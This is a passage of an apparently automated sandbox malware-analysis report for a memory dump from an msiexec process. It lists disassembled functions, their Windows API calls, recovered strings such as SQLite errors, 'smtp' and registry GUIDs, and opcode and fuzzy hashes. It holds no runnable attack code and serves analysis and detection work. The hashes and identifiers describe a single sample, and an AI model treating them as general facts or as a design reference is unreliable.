                                                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                    Function 0040C143 Relevance: 7.6, APIs: 5, Instructions: 54clipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1189762176-0
                                                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                    Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 4247780290-0
                                                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                    Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2775283111-0
                                                                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                    Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                    • API String ID: 885266447-2471937615
                                                                                                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                    Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi$_mbscpy
                                                                                                    • String ID: smtp
                                                                                                    • API String ID: 2625860049-60245459
                                                                                                    • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                    • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                    Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C28C
                                                                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                    • String ID: S_@$l
                                                                                                    • API String ID: 3436799508-4018740455
                                                                                                    • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                    • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                    Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy
                                                                                                    • String ID: C^@$X$ini
                                                                                                    • API String ID: 714388716-917056472
                                                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                    Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 3492281209-168460110
                                                                                                    • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                    • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                    Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 275601554-2167791130
                                                                                                    • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                    • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                    Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat
                                                                                                    • String ID: 3CD
                                                                                                    • API String ID: 3951308622-1938365332
                                                                                                    • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                    • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                    Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: rows deleted
                                                                                                    • API String ID: 2221118986-571615504
                                                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                    Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 76f24b0108b9a7b8947a56a4d5f69d4bfb07364dcaa12e179ef200f5209d5cdd
                                                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                    • Opcode Fuzzy Hash: 76f24b0108b9a7b8947a56a4d5f69d4bfb07364dcaa12e179ef200f5209d5cdd
                                                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                    Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                    • memset.MSVCRT ref: 0040D319
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 368790112-0
                                                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                    Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 00425850
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                    • __allrem.LIBCMT ref: 00425933
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992179935-0
                                                                                                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                    Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                    • API String ID: 2221118986-515162456
                                                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                    Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                    • memset.MSVCRT ref: 004026AD
                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                      • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3503910906-0
                                                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                    Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                    • atoi.MSVCRT(?,00000000,?,76230A60,?,00000000), ref: 0040B619
                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4107816708-0
                                                                                                    • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                    • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                    Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                    • strftime.MSVCRT ref: 00411476
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
